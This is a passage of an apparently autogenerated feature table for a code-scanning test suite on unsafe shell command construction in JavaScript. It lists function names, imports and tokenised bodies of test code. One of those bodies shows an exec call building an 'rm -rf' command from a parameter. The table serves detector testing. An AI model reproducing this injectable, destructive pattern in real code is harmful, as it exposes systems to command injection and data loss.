Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:1:248:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:1:248:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:1:248:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:1:248:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:1:248:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:1:248:28 | module. ... nitizer | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:1:248:28 | module. ... nitizer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:1:248:28 | module. ... nitizer | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:1:254:1 | module. ... // OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:1:254:1 | module. ... // OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:1:254:1 | module. ... // OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:8:248:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:8:248:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:8:248:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:16:248:28 | goodSanitizer | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:16:248:28 | goodSanitizer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:16:248:28 | goodSanitizer | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:248:31 | cleanInput | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:248:31 | cleanInput | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:248:31 | cleanInput | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:248:31 | cleanInput | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:248:31 | cleanInput | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:248:31 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:248:31 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:248:31 | cp | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:248:31 | cp | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:248:31 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:248:31 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:248:31 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:248:31 | this | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:248:31 | this | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:248:31 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:254:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:254:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:254:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:254:1 | 'arguments' object of anonymous function | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:254:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:254:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:254:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:254:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:254:1 | exceptional return of anonymous function | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:254:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:254:1 | functio ... // OK\\n} | assignedToPropName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:254:1 | functio ... // OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:254:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:254:1 | functio ... // OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:254:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:254:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:254:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:254:1 | return of anonymous function | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:32:254:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:42:248:45 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:42:248:45 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:42:248:45 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:42:248:45 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:42:248:45 | name | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:42:248:45 | name | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:42:248:45 | name | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:42:248:45 | name | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:42:248:45 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:42:248:45 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:3 | cp | enclosingFunctionBody | name cp exec rm -rf name cleaned cleanInput name cp exec rm -rf cleaned | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:3 | cp | enclosingFunctionName | goodSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 